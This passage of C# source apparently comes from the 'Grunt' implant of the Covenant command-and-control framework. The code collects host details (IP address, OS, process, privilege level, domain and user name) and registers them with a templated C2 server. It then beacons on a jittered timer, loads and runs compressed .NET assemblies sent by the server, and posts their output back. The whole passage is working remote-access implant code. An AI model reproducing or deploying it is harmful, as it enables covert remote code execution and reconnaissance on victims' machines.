public TaskCompletedArgs(GruntTaskingMessage message, String output)
{
this.message = message;
this.output = output;
}
public static void Execute(Aes SessionKey)
{
try
{
string CovenantURI = @"{{REPLACE_COVENANT_URI}}";
string CovenantCertHash = @"{{REPLACE_COVENANT_CERT_HASH}}";
int Id = Convert.ToInt32(@"{{REPLACE_GRUNT_ID}}");
string Name = @"{{REPLACE_GRUNT_NAME}}";
int Delay = Convert.ToInt32(@"{{REPLACE_DELAY}}");
int Jitter = Convert.ToInt32(@"{{REPLACE_JITTER}}");
int ConnectAttempts = Convert.ToInt32(@"{{REPLACE_CONNECT_ATTEMPTS}}");
List <string> ProfileHttpHeaderNames = new List <string>();
List <string> ProfileHttpHeaderValues = new List <string>();
// {{REPLACE_PROFILE_HTTP_HEADERS}}
List <string> ProfileHttpUrls = new List <string>();
// {{REPLACE_PROFILE_HTTP_URLS}}
List <string> ProfileHttpCookies = new List <string>();
// {{REPLACE_PROFILE_HTTP_COOKIES}}
string ProfileHttpGetResponse = @"{{REPLACE_PROFILE_HTTP_GET_RESPONSE}}";
string ProfileHttpPostRequest = @"{{REPLACE_PROFILE_HTTP_POST_REQUEST}}";
string ProfileHttpPostResponse = @"{{REPLACE_PROFILE_HTTP_POST_RESPONSE}}";
string IPAddress = Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
foreach (IPAddress a in Dns.GetHostAddresses(Dns.GetHostName()))
{
if (a.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
IPAddress = a.ToString();
break;
}
}
string OperatingSystem = Environment.OSVersion.ToString();
string Process = System.Diagnostics.Process.GetCurrentProcess().ProcessName;
int Integrity = 2;
if (Environment.UserName.ToLower() == "system")
{
Integrity = 4;
}
else
{
var identity = WindowsIdentity.GetCurrent();
if (identity.Owner != identity.User)
{
Integrity = 3;
}
}
string UserDomainName = Environment.UserDomainName;
string UserName = Environment.UserName;
string RegisterBody = @"{ ""id"": " + Convert.ToString(Id) + @", ""name"": """ + Name + @""", ""integrity"": " + Integrity + @", ""process"": """ + Process + @""", ""userDomainName"": """ + UserDomainName + @""", ""userName"": """ + UserName + @""", ""delay"": " + Convert.ToString(Delay) + @", ""jitter"": " + Convert.ToString(Jitter) + @", ""connectAttempts"": " + Convert.ToString(ConnectAttempts) + @", ""status"": 0, ""ipAddress"": """ + IPAddress + @""", ""operatingSystem"": """ + OperatingSystem + @""" }";
GruntMessenger messenger = new GruntMessenger
(
Id, Name, CovenantURI,
CovenantCertHash, SessionKey,
RegisterBody,
ProfileHttpHeaderNames, ProfileHttpHeaderValues,
ProfileHttpUrls, ProfileHttpCookies,
ProfileHttpGetResponse, ProfileHttpPostRequest, ProfileHttpPostResponse
);
TaskHandler taskSender = new TaskHandler();
EventHandler <TaskCompletedArgs> taskHandler = (sender, eventArgs) =>
{
messenger.PostMessage(eventArgs.output, eventArgs.message.name);
};
taskSender.TaskCompleted += taskHandler;
Random rnd = new Random();
int ConnectAttemptCount = 0;
bool alive = true;
while (alive)
{
Thread.Sleep((Delay + rnd.Next(Jitter)) * 1000);
try
{
GruntTaskingMessage message = messenger.GetMessage("");
if (message != null)
{
ConnectAttemptCount = 0;
if (message.type == GruntTaskingType.Assembly)
{
string[] pieces = message.message.Split(',');
if (pieces.Length > 0)
{
object[] parameters = null;
if (pieces.Length > 1)
{
parameters = new object[pieces.Length - 1];
}
for (int i = 1; i < pieces.Length; i++)
{
parameters [i - 1] = Encoding.UTF8.GetString(Convert.FromBase64String(pieces[i]));
}
byte[] compressedBytes = Convert.FromBase64String(pieces[0]);
byte[] decompressedBytes = Utilities.Decompress(compressedBytes);
Assembly gruntTask = Assembly.Load(decompressedBytes);
new Thread(() => taskSender.ExecuteTask(gruntTask, parameters, message)).Start();
}
}
else if (message.type == GruntTaskingType.Set)
{
GruntSetTaskingType type = (GruntSetTaskingType)Enum.Parse(typeof(GruntSetTaskingType), message.message.Substring(0, message.message.IndexOf(',')));
String val = message.message.Substring(message.message.IndexOf(',') + 1);
if (type == GruntSetTaskingType.Delay)
{
Delay = int.Parse(val);
}
else if (type == GruntSetTaskingType.Jitter)
{
Jitter = int.Parse(val);
}
else if (type == GruntSetTaskingType.ConnectAttempts)
{
ConnectAttempts = int.Parse(val);
}
}
else if (message.type == GruntTaskingType.Kill)
{
messenger.PostMessage("Killed", message.name);
return;
}
}
}
catch (Exception)
{
ConnectAttemptCount++;
if (ConnectAttemptCount >= ConnectAttempts)
{
return;
}
}
}
}
catch (Exception e) { Console.Error.WriteLine(e.Message); Console.Error.WriteLine(e.StackTrace); }
}